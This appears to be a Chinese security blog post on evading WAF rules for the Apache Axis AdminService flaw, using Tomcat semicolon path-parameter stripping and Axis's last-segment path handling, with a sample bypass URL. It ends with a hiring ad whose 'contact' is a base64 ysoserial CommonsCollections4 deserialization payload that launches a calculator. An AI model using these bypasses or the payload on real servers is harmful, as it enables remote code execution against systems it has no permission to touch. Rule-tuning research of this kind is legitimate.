最近在某次攻防演练中中遇到了Axis漏洞,简单记录一下原因。
Axis的poc的url类似如下
很多规则维护人员的规则,可能直接匹配/servlet/AdminServlet,可这样能防御绕过嘛?今天来分析下
在web.xml 中,url以services起始,都交给AxisServlet去处理。相关代码如下
<servlet-mapping><servlet-name>AxisServlet</servlet-name><url-pattern>/services/*</url-pattern></servlet-mapping>
由于本文不是分析文章,而是研究绕过手段。根据分析文章可知,AxisServlet最终会调用AdminService。主要代码在这里
axis会调用req.getPathInfo获取请求的实际URL相对于请求的serlvet的url的路径。也就是说 poc的url为/axis_exp_demo_war_exploded/services/AdminService,那么req.getPathInfo返回AdminService。Axis 通过这个信息,去查找最终处理的方法,也就是org.apache.axis.utils.Admin
既然这样,讨论下几种可能的绕过姿势
1. 中间件特性
这里只谈论tomcat,其他Java的中间件自行研究。用户在输入url中到应用程序通过request对象接收的url,tomcat会忽略掉某些字符。典型例子 Shiro的权限绕过。tomcat中,关于处理url的代码,在这里org/apache/catalina/connector/CoyoteAdapter.class
首先经过parsePathParameters处理,再经过normalize处理
1.1 parsePathParameters方法
看代码,主要是查找分号和斜杠,并删除分号和斜杠中间的字符。
例如,/aaa/;...sddd/index.php 经过这个函数的处理,会删除;…sddd。处理前
处理后
基于这个特性,可以构造出很多绕过姿势。并且,在最近某次演练中,就是抓到此类poc。
1.2 normalize
这个函数比较简单,且文档中已经说明用途,不做具体分析
This method normalizes “”, “//”, “/./” and “/../”.
2. Axis特性
前面我们分析了,Axis组件中,开头为Services的url会交给AxisServlet处理。但是在AxisServlet中,却又要url的路径的最后一部分,也就是AdminService。除此之外,这中间的任何字符都不会影响到漏洞的利用。POST /axis_exp_demo_war_exploded/services/chiieibe/AdminService基于这个特性,同样也可以绕过很多安全设备。
招聘
我司(启明星辰)检测本部 我所在的小组,招聘面向实战的安全研究人员。要求:
-
能分析漏洞 -
懂攻防
联系方式在下面,期待你的简历
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjMAgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwc3IAQG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuQ29tcGFyYWJsZUNvbXBhcmF0b3L79JkluG6xNwIAAHhwc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAuW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwdXIALltMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zNC5UcmFuc2Zvcm1lcjs5gTr7CNo/pQIAAHhwAAAAAnNyADxvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnM0LmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAN2NvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRyQVhGaWx0ZXIAAAAAAAAAAAAAAHhwc3IAP29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAUTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABhrK/rq+AAAANAA5AQAeeXNvc2VyaWFsL1B3bmVyNDQ1MzEyNDgyMzcwMzc1BwABAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAcAAwEAFGphdmEvaW8vU2VyaWFsaXphYmxlBwAFAQAGPGluaXQ+AQADKClWAQAKRXhjZXB0aW9ucwEAE2phdmEvbGFuZy9FeGNlcHRpb24HAAoBAARDb2RlDAAHAAgKAAQADQEAFmJhbmd6aGlsaWFuZ0BnbWFpbC5jb20IAA8BABFqYXZhL2xhbmcvUnVudGltZQcAEQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMABMAFAoAEgAVAQASb3BlbiAtYSBDYWxjdWxhdG9yCAAXAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAGQAaCgASABsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAgTHlzb3NlcmlhbC9Qd25lcjQ0NTMxMjQ4MjM3MDM3NTsBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBABBzZXJpYWxWZXJzaW9uVUlEAQABSgWtIJPzkd3vPgEADUNvbnN0YW50VmFsdWUBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhAQAMSW5uZXJDbGFzc2VzAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwcANgEAE1N0dWJUcmFuc2xldFBheWxvYWQAIQACAAQAAQAGAAEAGgAuAC8AAQAyAAAAAgAwAAMAAQAHAAgAAgAJAAAABAABAAsADAAAAB0AAgACAAAAESq3AA4SEEy4ABYSGLYAHFexAAAAAAABAB0AHgACAAwAAAA/AAAAAwAAAAGxAAAAAgAfAAAABgABAAAANAAgAAAAIAADAAAAAQAhACIAAAAAAAEAIwAkAAEAAAABACUAJgACAAkAAAAEAAEAKAABAB0AKQACAAwAAABJAAAABAAAAAGxAAAAAgAfAAAABgABAAAAOQAgAAAAKgAEAAAAAQAhACIAAAAAAAEAIwAkAAEAAAABACoAKwACAAAAAQAsAC0AAwAJAAAABAABACgAAgAzAAAAAgA0ADUAAAAKAAEAAgA3ADgACXVxAH4AHwAAAdTK/rq+AAAANAAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA9AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4dXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAABdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHcEAAAAA3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABcQB+ACl4
懂的都懂
原文始发于微信公众号(宽字节安全):老洞新绕
